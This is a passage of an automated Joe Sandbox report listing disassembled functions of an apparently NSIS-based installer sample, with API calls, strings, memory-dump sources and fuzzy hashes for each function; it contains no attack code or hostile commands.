                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                              • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                              • API String ID: 1916479912-1189179171
                                                                                              • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                              • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                              • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                              • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                              Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004241C1,762323A0,00000000), ref: 00406902
                                                                                              • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                              • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                              • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                              • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,004241C1,762323A0,00000000), ref: 00406A73
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                              • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                              • API String ID: 3581403547-1792361021
                                                                                              • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                              • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                              • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                              • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                              Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                              Strings
                                                                                              • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInstance
                                                                                              • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                              • API String ID: 542301482-1377821865
                                                                                              • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                              • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                              • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                              • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                              Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                              • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                              • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                              • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                              Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                              • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                              • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                              • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                              Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                              • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                              • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                              • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                              • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                              • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                              • API String ID: 20674999-2124804629
                                                                                              • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                              • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                              • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                              • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                              Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                              • GetSysColor.USER32(?), ref: 004041DB
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                              • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                              • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                              • SetCursor.USER32(00000000), ref: 004042FE
                                                                                              • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                              • SetCursor.USER32(00000000), ref: 00404322
                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                              • String ID: F$N$open
                                                                                              • API String ID: 3928313111-1104729357
                                                                                              • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                              • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                              • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                              • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                              Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                              • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                              • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                              • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                              • wsprintfA.USER32 ref: 00406B79
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                              • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                              • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                              • API String ID: 565278875-3368763019
                                                                                              • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                              • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                              • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                              • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                              • DeleteObject.GDI32(?), ref: 004010F6
                                                                                              • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                              • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                              • DeleteObject.GDI32(?), ref: 0040116E
                                                                                              • EndPaint.USER32(?,?), ref: 00401177
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                              • String ID: F
                                                                                              • API String ID: 941294808-1304234792
                                                                                              • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                              • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                              • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                              • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                              Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                              • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              Strings
                                                                                              • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                              • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                              • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                              • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                              • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                              • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                              • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                              • API String ID: 1641139501-220328614
                                                                                              • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                              • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                              • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                              • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                              Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                              • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                              • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                              • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                              • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                              • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                              • API String ID: 3734993849-3206598305
